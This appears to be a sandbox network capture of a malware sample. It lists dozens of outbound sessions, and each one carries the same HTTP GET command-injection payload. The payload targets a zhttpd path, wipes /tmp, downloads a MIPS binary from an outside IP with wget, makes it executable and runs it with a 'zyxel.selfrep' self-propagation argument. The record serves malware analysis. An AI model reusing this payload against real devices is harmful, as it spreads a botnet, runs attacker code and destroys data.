                              Mar 31, 2024 08:41:20.742185116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3653192.168.2.134300088.170.230.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.742221117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3654192.168.2.135829843.140.64.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.742255926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3655192.168.2.1344720154.207.131.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.742286921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3656192.168.2.1339610142.70.107.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.742330074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3657192.168.2.135025242.123.41.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.742392063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3658192.168.2.1356944211.12.124.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.742440939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3659192.168.2.135108812.247.187.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.742482901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3660192.168.2.1357856138.70.226.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.742527008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3661192.168.2.136090495.89.199.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.742568016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3662192.168.2.133578888.54.164.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.742618084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3663192.168.2.1339596174.68.16.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.742660046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3664192.168.2.134137494.100.78.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.742716074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3665192.168.2.134998097.11.198.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.742757082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3666192.168.2.1345270147.224.146.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.742808104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3667192.168.2.135221435.215.104.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.742854118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3668192.168.2.135542848.229.62.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.742891073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3669192.168.2.1343176199.215.227.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.742929935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3670192.168.2.135958675.152.155.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.742980003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3671192.168.2.1340200126.76.246.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.743005991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3672192.168.2.1350922174.167.111.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.743041039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3673192.168.2.1340276206.139.153.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.743076086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3674192.168.2.133689276.52.201.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.743098021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3675192.168.2.133830694.64.12.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.743149042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3676192.168.2.1337660167.96.28.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.743185043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3677192.168.2.1359414122.213.219.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.743237019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3678192.168.2.135636867.9.59.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.743278980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3679192.168.2.13477222.165.127.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.743320942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3680192.168.2.1339998119.85.220.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.743371964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3681192.168.2.1333306125.0.92.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.743415117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3682192.168.2.1345132198.199.173.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.743470907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3683192.168.2.135968668.214.232.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.743525028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3684192.168.2.1340032107.56.216.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.743557930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3685192.168.2.1340114168.172.53.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.743590117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3686192.168.2.135849670.71.240.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.743638992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3687192.168.2.1336246197.202.173.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.743694067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3688192.168.2.133717490.231.204.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.743732929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3689192.168.2.1336482148.167.39.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.743766069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3690192.168.2.1348606196.168.191.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.743817091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3691192.168.2.135691231.116.253.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.743872881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3692192.168.2.13405384.232.117.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.743880987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3693192.168.2.1333210125.251.193.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.743940115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3694192.168.2.1356482158.146.185.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.743978977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3695192.168.2.135512025.110.227.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.744021893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3696192.168.2.134192460.108.234.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.744071960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3697192.168.2.1359648122.117.141.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.744118929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3698192.168.2.1360790195.2.11.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.744170904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3699192.168.2.1350844137.15.28.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.744205952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3700192.168.2.1349392181.0.32.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.744240046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3701192.168.2.1337932104.244.42.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.744291067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3702192.168.2.134916474.172.184.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.744329929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3703192.168.2.1348668120.244.193.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.744385004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3704192.168.2.1358564205.145.197.249443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.744416952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3705192.168.2.134651241.18.177.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.744437933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3706192.168.2.1344290194.46.156.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.744493961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3707192.168.2.134070035.81.82.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.744545937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3708192.168.2.1351458178.15.209.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.744580984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3709192.168.2.134376425.101.209.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.744621038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3710192.168.2.135147053.94.147.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.744661093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3711192.168.2.134801273.228.251.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.744700909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3712192.168.2.13363962.134.47.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.744767904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3713192.168.2.135901253.190.174.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.744786978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3714192.168.2.1340674219.219.178.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.744832039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3715192.168.2.136047623.25.47.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.744877100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3716192.168.2.135668897.206.191.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.744927883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3717192.168.2.134196034.229.120.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.744965076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3718192.168.2.134670081.233.54.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.745012999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3719192.168.2.1339642163.40.251.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.745064974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3720192.168.2.1352818137.0.58.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.745110989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3721192.168.2.133848676.121.154.61443
                              TimestampBytes transferredDirectionData
